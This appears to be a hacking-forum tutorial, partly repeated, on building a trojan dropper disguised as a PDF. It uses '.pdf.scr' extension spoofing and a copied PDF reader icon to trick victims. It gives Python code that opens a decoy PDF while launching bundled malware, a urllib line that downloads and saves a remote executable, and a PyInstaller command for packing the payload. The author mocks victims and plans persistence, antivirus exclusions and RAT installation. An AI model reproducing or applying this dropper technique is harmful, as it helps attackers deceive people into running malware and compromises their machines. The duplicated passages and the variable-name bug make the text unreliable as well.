Introduction
In the past, we relied on exploits targeting specific PDF readers like Adobe Acrobat Reader, such as CVE-2009-0658. However, these exploits have become outdated, just like the .doc macros. More recently, we've seen the emergence of the Follina RCE exploit (CVE-2022-30190), which can still be exploited since it is a relatively new patch. Other exploits, on the other hand, are quickly patched[.] Nowadays, it's challenging to target people with these outdated exploits without a good zero-day vulnerability. However, there is one aspect that never becomes outdated: our brain. Yes, social engineering still remains a powerful approach.
We will not utilize any exploit, but instead, create a straightforward yet realistic pdf.scr.
Let's get started
To begin with, what does ".pdf.scr" mean? ".scr" is simply the file extension used for Windows screensavers. Originally, it was intended for displaying videos and animations as screensavers, but it can actually work with any executable (exe) file. As for the ".pdf" part, it's just a portion of the program's name, with only the last dot being significant. For example, you could have a file named "xss.txt.docx.pdf," which is clearly a PDF file. This technique is known as extension spoofing. Now, you might wonder what the purpose of all this is. Well, by default, Windows hides known file extensions, such as ".exe." So, you could simply name a file "xss.pdf.exe," but Windows would hide the ".exe" part and display it as "xss.pdf." However, when you hover your mouse over it, you'll realize that it's not actually a PDF file (although most people aren't familiar with the .scr file format). This is where the problem lies: human vulnerability to social engineering. To make it even more convincing, one could use the PDF reader icon, and many people (perhaps naive ones) would double-click on it, executing the malware.
A challenge arises when you don't know which PDF reader the target is using, making it difficult to use the exact icon. For most Windows 10 users, they tend to stick with the default Microsoft Edge PDF reader. However, for those who use a specific PDF reader and are familiar with its icon, this approach may encounter difficulties.
Now, let's imagine a scenario where you distribute this kind of malware to a company , and you don't want them to realize they've been hacked (because indeed, for the moment the PDF seems not to open because there is only the malware, stupid one will think the PDF is broken other will realize that they got hacked). One option is to make the malware drop or open a genuine PDF file. That's precisely what we'll be doing in this tutorial: creating a pdf.scr file with a PDF icon that actually opens a real PDF file.
So, go ahead and create your own test PDF, and let's dive into it.
In the past, we relied on exploits targeting specific PDF readers like Adobe Acrobat Reader, such as CVE-2009-0658. However, these exploits have become outdated, just like the .doc macros. More recently, we've seen the emergence of the Follina RCE exploit (CVE-2022-30190), which can still be exploited since it is a relatively new patch. Other exploits, on the other hand, are quickly patched[.] Nowadays, it's challenging to target people with these outdated exploits without a good zero-day vulnerability. However, there is one aspect that never becomes outdated: our brain. Yes, social engineering still remains a powerful approach.
We will not utilize any exploit, but instead, create a straightforward yet realistic pdf.scr.
Let's get started
To begin with, what does ".pdf.scr" mean? ".scr" is simply the file extension used for Windows screensavers. Originally, it was intended for displaying videos and animations as screensavers, but it can actually work with any executable (exe) file. As for the ".pdf" part, it's just a portion of the program's name, with only the last dot being significant. For example, you could have a file named "xss.txt.docx.pdf," which is clearly a PDF file. This technique is known as extension spoofing. Now, you might wonder what the purpose of all this is. Well, by default, Windows hides known file extensions, such as ".exe." So, you could simply name a file "xss.pdf.exe," but Windows would hide the ".exe" part and display it as "xss.pdf." However, when you hover your mouse over it, you'll realize that it's not actually a PDF file (although most people aren't familiar with the .scr file format). This is where the problem lies: human vulnerability to social engineering. To make it even more convincing, one could use the PDF reader icon, and many people (perhaps naive ones) would double-click on it, executing the malware.
A challenge arises when you don't know which PDF reader the target is using, making it difficult to use the exact icon. For most Windows 10 users, they tend to stick with the default Microsoft Edge PDF reader. However, for those who use a specific PDF reader and are familiar with its icon, this approach may encounter difficulties.
Now, let's imagine a scenario where you distribute this kind of malware to a company , and you don't want them to realize they've been hacked (because indeed, for the moment the PDF seems not to open because there is only the malware, stupid one will think the PDF is broken other will realize that they got hacked). One option is to make the malware drop or open a genuine PDF file. That's precisely what we'll be doing in this tutorial: creating a pdf.scr file with a PDF icon that actually opens a real PDF file.
So, go ahead and create your own test PDF, and let's dive into it.
Python program
As this guide targets beginners and aims to be uncomplicated and approachable, we will opt for the Python programming language.To begin with, we will require the malicious software itself. However, I won't be writing it from scratch for this tutorial. During my testing phase, I utilized a basic C# reverse shell instead of a complete malware. To make things more realistic (50mb PDF sadly don't exist), we can create a lightweight program that will download the malware and open a PDF.
This is a really basic implementation of the program if you want to make the program download and then exec you can just add these lines before the execution, easiest way is to use urllib:
At this point, we have successfully developed our basic functioning code, and we can proceed with utilizing tools like py2exe or pyinstaller. From my personal preference, I find auto-py-to-exe to be quite appealing as it provides a user-friendly interface for Pyinstaller. It encompasses all the Pyinstaller options, making it a straightforward and efficient choice. To install and run auto-py-to-exe, you can follow these steps:
Since it's with UI, I won't explain more how to pack in into an exe it's really simple you can even set any languages (see next part for "-i" arg). But the most important thing is maybe --add-data, in the additional -file part you will put your malware exe and the PDF file with the exact name you set into the Python file (You will directly find these file in the "MEIPASS_" folder during the program execution).
Here is the Pyinstaller command I got
Use UPX to make the final exe smaller, in a real life scenario I would make a C# program that download and exec the malware in less than 10 mb with + UPX:
Pyinstaller give the option to choose the ico file, and we need THAT ONE PDF READER ICON, I didn't find the "Official Microsoft Edge PDF reader ico", please, if you find it, tell me and I will upload it.
.ico can have multiple shapes depending the resolution for better optimization, this one do it perfectly
You may more understand by a picture:
As you can see at the left is a normal ico with a single res, the second one is the official one that increase the readability even with small resolution by making the writing "PDF" bigger.
Now, can you see the difference between these 2 files?
Yes you do but your victim won't, hehe
Once you downloaded and add this ico path to your Pyinstaller command, you just click "CONVERT .PY TO .EXE" wait approx 2 min, open the output folder rename in .scr, and we done...
Conclusion
Now you might realize one issue, when we open the exe, if the PDF reader is Microsoft edge we clearly see the path of the PDF, a kinda suspicious path (MEIPASS_ folder) because we notice that it's not where we opened the PDF.
To avoid this, the idea would be to copy the PDF file into the actual exe dir, and make the exe hide itself and finally open the PDF, you want the code? Well I'm still learning and I don't have it, I will very glad if anyone of you would take some time to teach me some secrets and keep learning more cool stuff.
Anyway we got a fake pdf (scr file) that open a real pdf, that's already nice! There is other way such as lnk file, which is kinda the same idea. Using this way you can in fact spoof any extensions and make open a real file, for example : .docx, .xls, txt, png & jpg the thing is that some program got icons that changed a lot during time like Microsoft Word and remember that you don't know what software use your target.
PD:
I am not an expert, if you can help me to continue learning I would greatly appreciate it, it is my way of sharing some knowledge. The next thing I want to do is address the persistence issue as well as add exclusions to install for example an .exe from a RAT. If anyone wants to help me I would appreciate it
Я не эксперт, если вы поможете мне продолжить обучение, я буду очень признателен, это мой способ поделиться некоторыми знаниями. Следующее, что я хочу сделать, это решить проблему с сохранением, а также добавить исключения для установки, например, .exe-файла из RAT. Если кто-то захочет мне помочь, буду признателен
As this guide targets beginners and aims to be uncomplicated and approachable, we will opt for the Python programming language.To begin with, we will require the malicious software itself. However, I won't be writing it from scratch for this tutorial. During my testing phase, I utilized a basic C# reverse shell instead of a complete malware. To make things more realistic (50mb PDF sadly don't exist), we can create a lightweight program that will download the malware and open a PDF.
Python:
import os
import time
import sys
import subprocess
scriptpath = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__))) # Getting the script dir, because yes during the execution the script is the %temp% directory in a specific folder named "_MEIPASS+randomnumber"
malware = os.path.join(script_dir, 'malware.exe') # Your malware directory from the script dir defined above will show a code if you want to download it from internet, make sure you put the right name
pdf = os.path.join(script_dir, 'xss.pdf') # Same for pdf make sure you put the right name
os.system(pdf) #We open PDF and will crash if there is an error
subprocess.Popen(malware, shell=True) #We exec the malware without stopping the flow of the program
#Imagine being that easy.This is a really basic implementation of the program if you want to make the program download and then exec you can just add these lines before the execution, easiest way is to use urllib:
Python:
import urllib.request
malwareurl = "https://github.com/idk/malware.exe"
downloadpath = "Updater.exe"
urllib.request.urlretrieve(malwareurl, downloadpath) # no need comment urllib is simply magicAt this point, we have successfully developed our basic functioning code, and we can proceed with utilizing tools like py2exe or pyinstaller. From my personal preference, I find auto-py-to-exe to be quite appealing as it provides a user-friendly interface for Pyinstaller. It encompasses all the Pyinstaller options, making it a straightforward and efficient choice. To install and run auto-py-to-exe, you can follow these steps:
pip install auto-py-to-exe && auto-py-to-exeSince it's with UI, I won't explain more how to pack in into an exe it's really simple you can even set any languages (see next part for "-i" arg). But the most important thing is maybe --add-data, in the additional -file part you will put your malware exe and the PDF file with the exact name you set into the Python file (You will directly find these file in the "MEIPASS_" folder during the program execution).
Here is the Pyinstaller command I got
Python:
pyinstaller --noconfirm --onefile --windowed --icon "C:/Users/censored/censored/pdf.ico" --name "xss.pdf" --upx-dir "C:/Users/censored/censored/UPX/ --clean --add-data "C:/Users/censored/Desktop/project/PDF_xss/xss.pdf;." --add-data "C:/Users/censored/Desktop/project/PDF_xss/malware.exe;." "C:/Users/censored/Desktop/project/PDF_xss/script.py"Use UPX to make the final exe smaller, in a real life scenario I would make a C# program that download and exec the malware in less than 10 mb with + UPX:
/p:EnableCompressionInSingleFile=true /p:PublishTrimmed=truePyinstaller give the option to choose the ico file, and we need THAT ONE PDF READER ICON, I didn't find the "Official Microsoft Edge PDF reader ico", please, if you find it, tell me and I will upload it.
.ico can have multiple shapes depending the resolution for better optimization, this one do it perfectly
You may more understand by a picture:
As you can see at the left is a normal ico with a single res, the second one is the official one that increase the readability even with small resolution by making the writing "PDF" bigger.
Now, can you see the difference between these 2 files?
Yes you do but your victim won't, hehe
Once you downloaded and add this ico path to your Pyinstaller command, you just click "CONVERT .PY TO .EXE" wait approx 2 min, open the output folder rename in .scr, and we done...
Conclusion
Now you might realize one issue, when we open the exe, if the PDF reader is Microsoft edge we clearly see the path of the PDF, a kinda suspicious path (MEIPASS_ folder) because we notice that it's not where we opened the PDF.
To avoid this, the idea would be to copy the PDF file into the actual exe dir, and make the exe hide itself and finally open the PDF, you want the code? Well I'm still learning and I don't have it, I will very glad if anyone of you would take some time to teach me some secrets and keep learning more cool stuff.
Anyway we got a fake pdf (scr file) that open a real pdf, that's already nice! There is other way such as lnk file, which is kinda the same idea. Using this way you can in fact spoof any extensions and make open a real file, for example : .docx, .xls, txt, png & jpg the thing is that some program got icons that changed a lot during time like Microsoft Word and remember that you don't know what software use your target.
PD:
I am not an expert, if you can help me to continue learning I would greatly appreciate it, it is my way of sharing some knowledge. The next thing I want to do is address the persistence issue as well as add exclusions to install for example an .exe from a RAT. If anyone wants to help me I would appreciate it
Я не эксперт, если вы поможете мне продолжить обучение, я буду очень признателен, это мой способ поделиться некоторыми знаниями. Следующее, что я хочу сделать, это решить проблему с сохранением, а также добавить исключения для установки, например, .exe-файла из RAT. Если кто-то захочет мне помочь, буду признателен
Последнее редактирование:
